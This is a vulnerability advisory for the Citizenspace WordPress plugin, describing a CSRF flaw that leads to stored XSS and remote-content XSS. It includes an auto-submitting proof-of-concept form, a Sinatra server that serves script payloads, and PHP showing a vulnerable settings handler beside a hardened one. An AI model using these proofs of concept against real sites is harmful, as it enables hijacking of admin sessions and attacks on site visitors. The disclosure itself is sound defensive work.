CVSS Summary

| Score | 4.3 Medium |
|---|---|
| Vector | Network |
| Complexity | Medium |
| Authentication | None |
| Confidentiality | None |
| Integrity | Partial |
| Availability | None |
If an attacker can convince a logged-in admin to visit a page of theirs, they can change the value of the citizenspace_url option via CSRF. That value is then inserted into the same page unescaped (citizenspace.php line 43).
```html
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
<script>
  jQuery(function () { document.forms[0].submit() })
</script>
<form action="http://wordpress.local/wp-admin/options-general.php?page=citizenspace" method="POST">
  <input type="hidden" name="cs_submit" value="true">
  <input type="hidden" name="citizenspace_url" value=""><script>alert(String.fromCharCode(100,120,119))</script>">
</form>
```
XSS can also be performed against non-logged-in users by using the above CSRF to set citizenspace_url to a valid URL you control (I used http://localhost:9999/). The plugin fetches content from that URL and inserts it into the page unescaped. Run the following Sinatra application (ruby exploit.rb -p 9999), and then direct users to http://example.org/cs_consultation/?path=http://localhost:9999/abc.
```ruby
require 'sinatra'

# Minimal stand-in for the Citizen Space API endpoints the plugin requests.
get '/api/1.0/citizen_space_version' do
  'ok'
end

# Responses are returned to the browser by the plugin without escaping.
get '/api/1.0/consult_body' do
  '<script>alert("dxw1")</script>'
end

get '/api/1.0/consult_sidebar' do
  '<script>alert("dxw2")</script>'
end
```
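For reference, here is the settings-save pattern that closes both the CSRF hole and the unescaped output described above. This is an added illustration, not the Citizenspace plugin's own code; the function names and the cs_nonce field are assumed for the example.

```php
<?php
// Added example, not the Citizenspace plugin's own code. Function and
// nonce names are assumed for illustration.

// The weak pattern as the advisory describes it: any POST carrying
// cs_submit=true updates the option, and the stored value is echoed raw.
function cs_save_settings_weak() {
    if ( isset( $_POST['cs_submit'] ) ) {
        update_option( 'citizenspace_url', $_POST['citizenspace_url'] );
    }
    echo '<input name="citizenspace_url" value="' . get_option( 'citizenspace_url' ) . '">';
}

// Hardened pattern: capability check, nonce check, URL validation on
// input, and attribute-context escaping on output.
function cs_save_settings_hardened() {
    if ( isset( $_POST['cs_submit'] ) ) {
        // Only users allowed to manage options may change the URL.
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_die( 'Insufficient privileges' );
        }
        // A form on an attacker's site cannot supply a valid nonce, so a
        // forged cross-site POST stops here.
        check_admin_referer( 'cs_save_settings', 'cs_nonce' );

        // Accept only an http(s) URL; esc_url_raw() returns '' otherwise.
        $url = esc_url_raw( wp_unslash( $_POST['citizenspace_url'] ), array( 'http', 'https' ) );
        if ( '' === $url ) {
            wp_die( 'Invalid URL' );
        }
        update_option( 'citizenspace_url', $url );
    }

    // Escape for the attribute context so a stored value cannot close the
    // quote and inject markup.
    echo '<form method="POST">';
    wp_nonce_field( 'cs_save_settings', 'cs_nonce' );
    echo '<input type="hidden" name="cs_submit" value="true">';
    echo '<input name="citizenspace_url" value="' . esc_attr( get_option( 'citizenspace_url', '' ) ) . '">';
    echo '</form>';
}

// For the front-end issue: fragments fetched from the configured API are
// third-party HTML, so restrict them to post-safe markup before output.
function cs_render_remote_fragment( $html ) {
    return wp_kses_post( $html );
}
```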
Current state: Fixed
This plugin should be upgraded immediately to version 1.1, which resolves these issues.
Special mention to the vendor, Delib, who responded extremely quickly and released an updated version just a few hours after our report.